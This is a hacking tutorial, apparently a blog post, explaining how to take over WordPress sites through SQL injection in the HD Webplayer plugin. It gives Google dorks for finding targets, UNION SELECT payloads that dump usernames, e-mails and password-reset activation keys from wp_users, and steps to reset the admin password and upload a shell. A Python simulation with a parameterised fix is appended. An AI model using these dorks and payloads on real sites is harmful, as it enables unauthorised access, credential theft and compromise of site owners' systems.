Hello friends, Chinmoy here, and today I am going to tell you how to hack a WordPress website using SQL injection.
I have posted many tutorials on web hacking and SQL injection, so today I am going to post one on WordPress...
____________________________
Title :- Hack WordPress Website Using SQL Injection
Difficulty Level :- Easy!
This Tutorial Is For Educational Purpose Only.
____________________________
Video tutorial will be uploaded soon.
1. Find a vulnerable page using Google dorks:
Google Dorks:
Dork I (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="
Dork II(playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="
Dork III (General):
inurl:"/wp-content/plugins/hd-webplayer/"
2. You will find many sites indexed for this plugin. Pick one and check whether it is still vulnerable, because most of them no longer work: the plugin has been patched or removed.
A site address will look like this:
http://www.website.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=3
Now check whether this URL is vulnerable to SQLi by appending a single quote [ ' ] to the videoid value. The quote breaks the SQL query, so if the playlist output disappears or the page shows a database error instead, the parameter is injectable and you may proceed:
http://www.website.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=3'
When you open the site you will see something like this (screenshot):
3. We will not walk through a full SQLi here; we only want the admin username and e-mail, so inject this after the URL you found. The 11 values in the UNION match the number of columns in the plugin's own query, videoid=-3 makes the original query return no rows so only the injected row is displayed, and 0x3a / 0x3b are the ':' and ';' separators between each username and e-mail:
http://www.website.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
If it works, the username and e-mail of every user will appear in the XML output shown above. Then go to the login page of the site; the WordPress login page is usually here:
http://www.site.com/wp-login.php
Enter the username and click "Lost your password?". On the next page enter either the username or the e-mail address in the field (we entered the e-mail).
It will then tell you to "check your e-mail for the confirmation link".
Now we need the "activation key" that WordPress wrote to the wp_users table when the reset was requested, so go back to this URL:
http://www.website.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
and replace " UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users-- "
with " UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users-- "
Now you will get the username and activation key, so go and reset the password at: www.site.com/wp-login.php?action=rp&key=resetkey&login=username
NOTE: Replace key= with the activation key and login= with the username. When the new page opens, enter the new password and you are done; you now have access to the site, and you can upload your shell and edit the site's template (refer to the video for that step). This last step only works on old WordPress versions: since WordPress 4.3, user_activation_key stores a timestamp plus a salted hash of the reset key rather than the key itself, so a value dumped from the database cannot be pasted into the reset URL.
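The whole procedure, re-created offline as an added example that is not code from the tutorial or from the HD Webplayer plugin: an sqlite3 simulation of the videoid parameter being concatenated into the query, the single-quote check from step 2, the UNION payload from steps 3 and 4 (switching between user_email and user_activation_key), and the parameterised fix beside it. The table named wp_hdplayer_videos, its 4 columns, the reduced wp_users table and the sample rows are all constructed for the demo; the real plugin query returned 11 columns, which is why the tutorial's UNION lists 11 values, and the count must match whatever query you are injecting into.

```python
# Added example, not the plugin's code. Assumed schema and sample rows are
# constructed here; column names in wp_users follow WordPress, the video table
# is a stand-in for whatever the plugin's playlist.php really selects from.
import sqlite3


def make_db():
    """In-memory database with constructed sample data."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE wp_hdplayer_videos (id INTEGER, title TEXT, url TEXT, thumb TEXT);
        INSERT INTO wp_hdplayer_videos VALUES (3, 'Intro', 'intro.mp4', 'intro.jpg');
        CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_email TEXT,
                               user_activation_key TEXT);
        INSERT INTO wp_users VALUES (1, 'admin', 'admin@example.com', 'k3yadmin');
        INSERT INTO wp_users VALUES (2, 'editor', 'editor@example.com', '');
    """)
    return db


def vulnerable_playlist(db, videoid):
    """The flaw the tutorial exploits: the GET value is spliced straight into SQL."""
    sql = "SELECT id, title, url, thumb FROM wp_hdplayer_videos WHERE id = " + videoid
    return db.execute(sql).fetchall()


def hardened_playlist(db, videoid):
    """Fix: enforce the integer type, then bind the value instead of splicing it."""
    vid = int(videoid)  # "3'" and "-3 UNION SELECT ..." both raise ValueError here
    sql = "SELECT id, title, url, thumb FROM wp_hdplayer_videos WHERE id = ?"
    return db.execute(sql, (vid,)).fetchall()


def quote_breaks_query(db):
    """Step 2: the stray quote is a syntax error, so the playlist output vanishes."""
    try:
        vulnerable_playlist(db, "3'")
    except sqlite3.OperationalError:
        return True
    return False


def union_dump(db, column):
    """Steps 3 and 4: -3 matches no video, so the only row returned is the UNION
    row, whose third column carries every user as login:<column> joined by ';'.
    The tutorial's MySQL form is group_concat(user_login,0x3a,<column>,0x3b);
    SQLite's group_concat takes (expr, separator), so the same payload is
    written here with || for the colon and ';' as the separator."""
    payload = (f"-3 UNION SELECT 1,2,group_concat(user_login || ':' || {column}, ';'),4 "
               "FROM wp_users--")
    rows = vulnerable_playlist(db, payload)
    return rows[0][2]


def hardened_rejects(db, videoid):
    """True when the parameterised version refuses the input outright."""
    try:
        hardened_playlist(db, videoid)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("quote test breaks page:", quote_breaks_query(db))
    print("e-mails:", union_dump(db, "user_email"))
    print("activation keys:", union_dump(db, "user_activation_key"))
    print("hardened rejects payload:", hardened_rejects(db, "-3 UNION SELECT 1"))
```

Run it and you get the same shape of output the tutorial reads out of the XML: one row, one column holding every user. The hardened version shows why the fix is a type check plus a bound parameter rather than quote-escaping: videoid is numeric, so there is no quote to escape, and only binding keeps the UNION from ever being parsed as SQL.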
Any doubts, feel free to comment.